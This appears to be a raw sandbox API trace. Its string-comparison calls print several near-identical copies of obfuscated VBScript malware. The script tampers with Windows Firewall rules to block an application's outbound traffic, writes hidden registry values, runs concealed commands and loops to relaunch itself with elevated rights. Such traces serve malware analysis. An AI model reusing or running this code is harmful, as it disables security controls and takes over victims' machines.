bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 53 [0226.324] wcsncmp (_String1="LOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0226.324] wcsncmp (_String1="OCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0226.324] wcsncmp (_String1="CK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0226.324] wcsncmp (_String1="K = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, 